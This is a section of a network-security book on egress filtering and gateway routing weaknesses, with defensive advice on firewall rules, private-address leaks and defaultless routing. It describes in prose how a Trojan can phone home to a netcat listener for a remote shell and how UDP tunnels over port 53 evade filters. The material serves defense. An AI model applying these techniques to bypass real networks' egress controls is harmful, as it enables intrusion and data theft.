Exposing Weaknesses

There are many exploits that rely heavily on the utilization of a target network's lax egress rules in order to be completely effective. These characteristics are important to understand because, in many cases, a savvy administrator can provide a second layer of defense that continues to secure his network (at least partially) even after the successful exploitation of vulnerability.

Weaknesses in Egress Packet Filters

We've been asked by several security administrators, "What do you think is my most dangerous firewall rule?", as they're waiving a multipage listing of packet filtering rules they haven't given us time to read. Many times, with a quick glance, we're able to say, "The first one." This isn't because we're trying to be pedantic or doubting their ability to construct an appropriate filter policy. It's because the first rule (whether written or implied by their firewall platform, as is sometimes the case) is actually very dangerous. Here's an example:

 permit tcp any any established 

If you search the Internet for "permit tcp any any established," you'll find over a hundred references (mostly by manufacturers of firewall and routing gear) recommending that users implement this rule, normally at the top of their firewall configuration. Even though most well-engineered packet filtering platforms include an implicit "deny all" at the bottom of the user -configured policy, many of them suggest the last line of your policy implement an explicit "deny all" rule along the lines of:

 deny any any 

In our opinion that last line is important, even if your packet filter does it automatically. When paired with this explicit deny-all rule, the first rule sounds innocent enoughdeny everything, but allow "already-established" connections to flow. We've already explained stateful and stateless packet filtering techniques in Chapter 5, including what constitutes an established TCP connection, but we'll remind you that different firewall vendors have different definitions of stateful. More importantly, this rule may represent the most costly exposure your organization ever experiences once you've been infiltrated. The rule, by itself, is equivalent to saying "If you're inside my network, you may go anywhere on the Internet and use any service as long as you connect to it before it connects back to you."

Some vendors almost make this strategy feasible by providing application layer, transparent filters, such as web proxies that filter inappropriate content like ActiveX controls and other potentially dangerous HTTP payloads. But that isn't enough. Especially because these application layer filters can only operate on protocols they know about.

Case in point: Through our reconnaissance activities, let's say we determine that a remote computer is susceptible to some malicious code injection technique and we exploit that vulnerability to place an egg or Trojan on the system that will phone home to us. We may have a netcat instance on a specific port of another system we've compromised just waiting to receive a remote shell from our egg. You've just allowed us to run that communication through port 60,501 (as an example of an arbitrary destination port) if we wanted to. And while this may look silly enough to concern someone constantly monitoring net flows, in all likelihood , you aren't. This situation is depicted in Figure 9-2.

image from book
Figure 9-2: A Trojan phoning home to provide a remote shell

As detailed in Chapter 17, botnets and spyware rely heavily on their ability to upload their spoils to a listening server controlled by the attacker. In the case of botnets , compromised machines are relatively useless unless they can converse with the predesignated control channel(s) to get their next set of instructions from the bot master. The fewer options these threats have for those communications, the safer your organization.

The TCP established catch-all rule is dangerous. Desktops within your organization (and even servers for that matter) shouldn't be able to communicate over any protocol with any system on the Internet. In fact, you may be able to narrow down their scope of activity to under 20 protocols and allow those specifically , while denying everything else. In fact, there's no reason you can't isolate those protocols and specifically allow them to be "established," and save yourself some work in the filter policy. But without this diligence, allowing generally any TCP that is internally initiated is a lazy administrator's way of reducing his workload while placing his organization at inordinate risk.

Note 

"Protocols" here mean application-level protocols using TCP for transport, not protocols with distinct assigned numbers in the IP header, such as those listed in the /etc/protocols file on UNIX-based operating systems.

Tip 

To those who claim that allowing TCP to be established globally is necessary because of the diversity and complexity of your networks, we suggest familiarizing yourselves with netflow and flow-oriented tools such as argus. These tools will help you learn enough about your network to be able to implement more sophisticated filters successfully and without disruption of your users and critical applications.

Even once you've removed your "allow any tcp established" catch-all, a sophisticated attacker will adapt and utilize something you're not filtering, such as port TCP/80 or TCP/443 that you've explicitly allowed for web browsing. However, if you've implemented application layer firewalls (proxies), you may be able to catch themat least you've raised the bar so fewer attackers can exploit the established rule. Application layer filters catch these kinds of attacks in various ways and with varying levels of success. Without them, you have almost no chance of defending against such threats.

We cannot simply focus on TCP. UDP is certainly less flexible when it comes to taking advantage of established rules on stateful firewalls, but it may be used to create largely the same effects. Some examples of exploiting egress using UDP include

  • Existing software programs such as Fryxar's Tunnelshell are able to create remote shells over UDP. Since many organizations unwittingly allow all inbound UDP traffic to port 53 (though this should not be done) for DNS- related purposes and don't restrict the egress of UDP at all, Fryxar's Tunnelshell (or similar software) can be used to create a remote access environment for the attacker that is difficult to detect. See http://www.geocities.com/fryxar/.

  • UDP-based application layer protocols may be implemented asymmetrically with ease. Therefore, if you can listen on one port and talk on another, it is easy to confuse network security monitoring systems that don't necessarily put the two channels together to identify a threat.

  • Next-generation file sharing networks can utilize UDP to transmit files when TCP is restricted. This is an easy way to move data out of an organization.

The bottom line is that egress needs to be restricted to as few protocols and endpoints as possible.

Weaknesses in Gateway Routing

There are two weaknesses we see time and time again with regard to gateway routing. Both are simple to understand and easy to correct.

Private Network Data Leaks

In order to simplify interior routing protocol configuration, many organizations configure their Internet gateway routers to "default" to their upstream providers' next hop. Many of these organizations have also made extensive use of IP addresses meant to be used as private, internal-use-only addresses (such as those listed in RFC 3330 and those mentioned in RFC 1918 specifically). While RFC 1918 states that data sent to these addresses should not be accepted if routed through your Internet provider, a number of providers accept it, routing it to another destination. Some organizations even collect this data on ISP networks for research purposes.

If certain routing protocols are misconfigured or new systems are added to the network exposing configuration problems, it is easy for data to leak out to the provider, causing unintended information disclosure. Consider the following example:

An organization is using the network 10.10.10.0/24 in their headquarters location. They are also using 10.10.20.0/24 in branch office A and 10.10.30.0/24 in branch office B, both of which are connected to the core headquarters router (which is also their default route) through point-to-point network links such as T-1 circuits. Now, let's say branch office C comes online using network 10.10.40.0/24, but is connected to branch office B instead of the headquarters location. In this situation, users in branch offices B and C will likely have no problem connecting to the services in branch office C because they are directly connected, but users in the headquarters location and branch office A are unable to connect unless routing entries are added to the headquarters router directing their packets (destined for 10.10.40.0/24) to branch office B as the next hop for branch office C as their ultimate destination. Worse, without these entries in place, users at the headquarters location and branch office A may try to communicate with branch office C's network and their data will leak out to the Internet (the headquarters' router's default route) instead of being directed to branch office C by way of branch office B, as shown in Figure 9-3.

image from book
Figure 9-3: A data leak occurring between branch offices

This specific threat is better described in Chapter 2. Because complicated-to-debug logical and physical routing changes can occur easily, your firewall configuration should give ample consideration to filtering such traffic attempting to egress your network (instead of simply assuming these conditions won't occur).

Connecting Internal Networks with Gateway Routers or Firewalls

Another router and/or firewall configuration issue leading to serious problems is the use of Internet gateway devices as local gateways between internal network segments. In order to save money, many organizations have added capacity to their existing gateway router or firewall to connect their internal networks. This also gives them the added benefit of being able to easily filter traffic between internal network segments and is recommended by some vendors, as depicted in Figure 9-4.

image from book
Figure 9-4: A firewall being used to connect internal network segments while also serving as the Internet gateway
Note 

The term "Internet gateway devices" is used here to mean any routing device acting as a gateway between the Internet and your organization's network. This may be a simple router, a combined router/modem, or even a firewall. In any case, the threat is still the same as discussed herein.

The problem with this configuration has nothing to do with the use of a firewall or router to connect internal network segments (and further, has nothing to do with the placement of the device in conjunction with other network elements such as firewalls). The problem is that an externally (Internet) reachable gateway device is being used to do it. Needless to say, if an attacker was able to gain control over that device from the outside, he could wreak havoc with your internal routing. But infiltration isn't required, and this is where the real problem comes in. During a denial-of-service attack, not only will your Internet connection be flooded and/or disabled, but also your gateway device is likely to "fall over," causing internal performance or even reachability problems between your internal network segments, as shown in Figure 9-5.

image from book
Figure 9-5: A DDoS attack rendering internal networks unreachable

Other Egress Routing Considerations

Another strategy adopted by some large organizations is the removal of their default route altogether. If an organization participates in an exterior routing protocol (BGP, for example) with their Internet provider, they may elect to receive what is known as a full table (all routes known on the Internet) with or without a default route. This is especially useful if they have connections to multiple upstream ISPs and can select the best path for optimal performance. If they are receiving a full table, theoretically, they don't need a default route, because they know about all possible routes.

In this configuration, internal systems will be configured with a default route as they normally would, but your gateway router (the first/last hop in your network) would not have one, or it would set the gateway of last resort (default route) to a monitoring segment where traffic can be analyzed . This fits well with what you'll learn in Chapter 10. In fact, most organizations that run "defaultless" actually do have a default route that directs traffic into some kind of analysis system.

While it makes for an excellent darknet feeder and consequently a fast worm detector, we recommend you exercise extreme caution with this approach. There can easily exist circumstances where an attacker may disrupt your BGP session (or that of your provider), rendering your circuits useless even when they are working properly, merely because you've lost your routing instructions and have no gateway of last resort.

While running defaultless at the edge of your network isn't feasible for many organizations, this methodology can be modified slightly to take limited advantage of the same idea. Certain workstations or servers (that presumably don't need to speak to the Internet except through proxies) may be configured without default routes. In this configuration, the servers can still be completely productive inside your network, but should they ever get compromised (infected by a worm, for example), they will be unable to reach Internet hosts (except potentially through proxies), which may stave off further infection or infiltration.



Extreme Exploits. Advanced Defenses Against Hardcore Hacks
Extreme Exploits: Advanced Defenses Against Hardcore Hacks (Hacking Exposed)
ISBN: 0072259558
EAN: 2147483647
Year: 2005
Pages: 120

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net